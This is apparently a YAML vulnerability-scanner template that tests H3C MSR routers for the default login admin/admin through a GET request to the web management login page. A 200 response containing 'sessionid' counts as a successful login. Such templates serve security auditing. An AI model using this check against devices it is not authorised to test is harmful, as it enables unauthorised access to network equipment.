id: h3c-router-msr-login
finger:
  - H3C MSR
info:
  author: pdteam
  name: h3c-router-msr-default-password
  severity: high
  tags: router
requests:
  - method: GET
    path:
      - '{{BaseURL}}/wnm/frame/login.php?user_name={{username}}&password={{password}}&ssl=false'
    attack: pitchfork
    matchers:
      - status:
          - 200
        type: status
      - type: word
        words:
          - sessionid
    matchers-condition: and
    payloads:
      user:
        - admin
      pass:
        - admin
